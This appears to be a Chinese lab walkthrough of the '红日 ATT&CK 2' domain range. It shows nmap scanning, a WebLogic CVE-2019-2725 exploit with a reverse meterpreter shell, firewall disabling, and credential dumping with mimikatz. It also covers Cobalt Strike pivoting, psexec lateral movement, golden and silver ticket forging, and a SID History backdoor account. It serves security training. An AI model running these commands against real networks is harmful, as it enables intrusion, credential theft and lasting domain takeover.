环境配置

首先把我们的NAT模式改成靶场的网段

然后配置一下

web靶机,这个需要先还原V1.3快照才能用默认密码登录

之后进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin

管理员:Administrator/1qaz@WSX

以管理员身份开启weblogic服务

1	netstat -ano \| findstr 7001

开启PC,输入用户名密码让360自启动

外网打点

搜集ip信息

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:a8:7e, IPv4: 192.168.111.145
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.111.1   00:50:56:c0:00:08       VMware, Inc.
192.168.111.2   00:50:56:fc:4b:0c       VMware, Inc.
192.168.111.80  00:0c:29:a3:4d:99       VMware, Inc.
192.168.111.143 00:0c:29:47:7d:be       VMware, Inc.
192.168.111.201 00:0c:29:70:b8:b3       VMware, Inc.
192.168.111.254 00:50:56:fe:0b:2d       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.906 seconds (134.31 hosts/sec). 6 responded

搜集靶机信息

┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -sV -Pn -T4 -A 192.168.111.80
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-20 03:48 EDT
Nmap scan report for 192.168.111.80
Host is up (0.00055s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
|_ssl-date: 2023-04-20T07:50:43+00:00; +2s from scanner time.
| ms-sql-ntlm-info: 
|   Target_Name: DE1AY
|   NetBIOS_Domain_Name: DE1AY
|   NetBIOS_Computer_Name: WEB
|   DNS_Domain_Name: de1ay.com
|   DNS_Computer_Name: WEB.de1ay.com
|   DNS_Tree_Name: de1ay.com
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-04-20T07:08:57
|_Not valid after:  2053-04-20T07:08:57
3389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=WEB.de1ay.com
| Not valid before: 2023-04-19T06:59:42
|_Not valid after:  2023-10-19T06:59:42
|_ssl-date: 2023-04-20T07:50:43+00:00; +2s from scanner time.
7001/tcp  open  http         Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_http-title: Error 404--Not Found
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:0C:29:A3:4D:99 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7
OS details: Microsoft Windows 7
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: WEB
|   NetBIOS computer name: WEB\x00
|   Domain name: de1ay.com
|   Forest name: de1ay.com
|   FQDN: WEB.de1ay.com
|_  System time: 2023-04-20T15:50:02+08:00
| ms-sql-info: 
|   192.168.111.80:1433: 
|     Version: 
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 1433
|_clock-skew: mean: -1h19m58s, deviation: 3h15m57s, median: 0s
|_nbstat: NetBIOS name: WEB, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:a3:4d:99 (VMware)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-04-20T07:50:02
|_  start_date: 2023-04-20T07:09:24

TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.111.80

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.90 seconds

80     IIS7.5
139    存在有samba服务可能会有远程命令执行漏洞  ms17_010(永恒之蓝)漏洞正是通过端口139/445进行攻击
445    smb受到哈希传递攻击	弱口令 ms_08067溢出
1433   mssql 弱口令
3389   windows远程桌面哈希传递攻击  弱口令
7001   Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)

尝试永恒之蓝但被360拦截

从weblogic入手,使用工具扫描探测

tasklist看下杀软

冰蝎webshell

获取路径写入shell

1	\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\aaanz.jsp

写入冰蝎马

msf 拿shell

利用模块

search CVE-2019-2725

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice 进入CVE-2019-2725攻击漏洞模块

set target Windows      这个模块默认是unix 所以改为Windows

set payload  windows/x64/meterpreter/reverse_tcp 

set LHOST 192.168.111.145

set rhosts 192.168.111.80  要攻击目标

exploit

多尝试一次就成功了

内网渗透

接着思路二走

关掉杀软和防火墙

run killav 尝试关闭杀软,但是java的meterpleter不支持
shell
chcp 65001
netsh advfirewall show allprofile state		关闭防火墙可以
netsh advfirewall set allprofiles state off

尝试直接提权失败

1 2	meterpreter > getsystem [-] Error running command getsystem: Rex::TimeoutError Send timed out

进程迁移提权

然后通过显示进程pid 用migrate进行进程迁移到一个高权限进程文件

获得system权限

令牌窃取提权

load incognito                 加载incognito(伪装)
getuid                         查看当前token
list_tokens -u                 列出可用token
impersonate_token "NT AUTHORITY\\SYSTEM"   token窃取，格式为impersonate_token"主机名\\用户名"
rev2self                       返回之前的token

成功

使用kiwi得到账号密码

1 2	meterpreter > load kiwi meterpreter > creds_all

域管理员登陆过主机,直接得到了明文密码,所以可以开启 3389端口登录上去然后直接关闭杀软

1	query user 看一下防止远程桌面被挤下去

转发cs提权

msf转发cs

可以上传免杀webshell执行或者msf直接转发,但是要先关掉防火墙,可以先ping一下试试

这里我们延续思路二使用msf模块连接上以后挂到后台session

1	sessions -i id 进入交互式

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_tcp
set DisablePayloadHandler true   
默认情况下，payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个，所以这里我们设置为true
set lhost 192.168.111.143  cs监听的ip
set lport 6666   cs监听的port
set session 2  选择派生的session
exploit

这样就可以了,不用代理

beacon> sleep 1
[*] Tasked beacon to sleep for 1s
[+] host called home, sent: 16 bytes
beacon> shell ipconfig /all

beacon> shell ping de1ay.com  获取域控内网IP

beacon> net view

 Server Name             IP Address                       Platform  Version  Type   Comment
 -----------             ----------                       --------  -------  ----   -------
 DC                      10.10.10.10                      500       6.3      PDC    
 PC                      192.168.111.201                  500       6.1             
 WEB                     192.168.111.80                   500       6.1             
 
beacon> shell net group "domain controllers" /domain

beacon> shell net group "domain computers" /domain

[*] Ladon 10.10.10.0/24 OnlinePC
load OnlinePC
10.10.10.0/24 is Valid CIDR
IPCound: 256
Scan Start: 2023-04-21 18:16:40
ICMP: 10.10.10.10	00-0C-29-38-C5-2F	DC             	VMware
ICMP: 10.10.10.80	00-0C-29-A3-4D-A3	WEB            	VMware
DNS: 10.10.10.201	00-0C-29-70-B8-BD	PC.de1ay.com   	VMware
=============================================
OnlinePC:3
Cidr Scan Finished!

横向移动

DC不出网,pth需要使用SMB

psexec横移(msf)

445是开着的,那么设置路由后使用exploit/windows/smb/psexec即可

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass 1qaz@WSX

psexec横移(cs)

beacon> rev2self
[*] Tasked beacon to revert token
beacon> make_token DE1AY\Administrator 1qaz@WSX
[*] Tasked beacon to create a token for DE1AY\Administrator
beacon> jump psexec DC SMB
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_a9) on DC via Service Control Manager (\\DC\ADMIN$\9ca293a.exe)
[+] host called home, sent: 287632 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
Started service 9ca293a on DC
[+] established link to child beacon: 10.10.10.10

成功上线

后渗透权限维持

黄金票据

所需条件:

1、域名称

2、域的SID值(用户的sid值去掉最后一个杠的数字就是域sid值)

3、域的KRBTGT账号的HASH

4、伪造任意用户名

（获取域的SID和KRBTGT账号的NTLM HASH的前提是需要已经拿到了域的权限）

黄金票据有TGT加密有效期通常为 10 小时

获取域的KRBTGT账户NTLM密码哈希

1
2
3

hashdump

//82dfc71b72a11ef37d663047bc2088fb

域的SID值

1
2
3

logonpasswords

//S-1-5-21-2756371121-2868759905-3853650604-1001

或者

1	wmic useraccount get name,sid

1	mimikatz kerberos::golden /user:de1ay /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /endin:480 /renewmax:10080 /ptt

成功

创建票据

1	mimikatz kerberos::golden /user:de1ay /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /ticket:ticket.kirbi

1	mimikatz kerberos::ptt ticket.kirbi

beacon> mimikatz kerberos::golden /user:de1ay /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /ticket:ticket.kirbi
[*] Tasked beacon to run mimikatz's kerberos::golden /user:de1ay /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /ticket:ticket.kirbi command
[+] host called home, sent: 787058 bytes
[+] received output:
User      : de1ay
Domain    : de1ay.com (DE1AY)
SID       : S-1-5-21-2756371121-2868759905-3853650604
User Id   : 500
Groups Id : *513 512 520 518 519 
ServiceKey: 82dfc71b72a11ef37d663047bc2088fb - rc4_hmac_nt      
Lifetime  : 2023/4/21 21:54:38 ; 2033/4/18 21:54:38 ; 2033/4/18 21:54:38
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

beacon> mimikatz kerberos::ptt ticket.kirbi
[*] Tasked beacon to run mimikatz's kerberos::ptt ticket.kirbi command
[+] host called home, sent: 787055 bytes
[+] received output:

* File: 'ticket.kirbi': OK

1
2
3

mimikatz kerberos::purge         //清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造
mimikatz kerberos::list          //查看当前机器凭证
mimikatz kerberos::ptt 票据文件   //将票据注入到内存中

模拟下域控会话被清除,依然可以使用黄金票据提权

可正常访问域控C盘

1	shell dir \\10.10.10.10\c$

SID History域后门

SID History可以防止用户迁移进入不同的域后权限发生改变,原理是如果迁移后用户SID改变了系统会将其原来的SID添加到迁移以后的用户SID History属性中,使其依然可以访问原来的资源,可以使用mimikatz把SID History属性添加到任意用户SID History属性,这样在获取域管理员权限后可以实现持久化

域控制器上新建一个恶意用户whoami

1	net user whoami Liu78963 /add

shellcode_inject启动mimikatz,将域管理员Administrator的SID添加到恶意域用户whoami的SID History属性中

1
2
3

privilege::debug
sid::patch    #修复NTDS服务,可以使高权限SID注入到地权限用户的SID History属性
sid::add /sam:whoami /new:Administrator   //将Administrator的SID添加到whoami的SID History属性中

然后用powershell验证一下whoami的SID History

load powershell
powershell_shell
Import-Module activedirectory
Get-ADUser whoami -Properties sidhistory
Get-ADUser administrator -Properties sidhistory

这样whoami就有了administrator域管权限,并且可以使用该用户登录域控

PC

web给pc创建一个映射

1	shell net use X: \\pc\c$

kali远程桌面交互式命令执行

Load Open3389
Default Port is 3389 (0xd3d)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    PortNumber    REG_DWORD    0xd3d
操作成功完成

1	rdesktop 192.168.111.80:3389

然后传马

1	copy C:\Users\mssql\big.exe \\pc\c$

创建计划任务

1	at \\pc 10:39:00 cmd.exe /c "start C:\\big.exe"

成功上线

白银票据

所需条件:

1、域名称

2、域的SID值(用户的sid值去掉最后一个杠的数字就是域sid值)

3、服务账号的NTML HASH

4、伪造的用户名

5、可利用的服务

白银票据由TGS加密通常只有几分钟生效时间

获取

1	mimikatz sekurlsa::logonpasswords

这里我们伪造cifs服务,这里应该是拿DC$的

kerberos::golden /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /target:DC.de1ay.com /service:cifs /rc4:9c9b02e33a331dce48e161488db8394c /user:test /ticket:silver.kirb

登录域内普通用户,先清空凭据在将白银票据导入内存中
kerberos::purgekerberos::ptt 生成票据位置

/domain：域名

/sid：域sid

/target：目标服务器主机名

/service：服务类型

/rc4：目标主机NTLM Hash

/user：随意输入的伪造名称

/ticket：生成的票据文件名称

1	shell dir \\DC\c$

1
2
3

mimikatz kerberos::purge         //清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造
mimikatz kerberos::list          //查看当前机器凭证
mimikatz kerberos::ptt 票据文件  //将票据注入到内存中

也可以用exe,直接用cs要保存好凭据

1	mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > hash.txt

红日ATT&CK之二 | 青叶 (evalexp.top)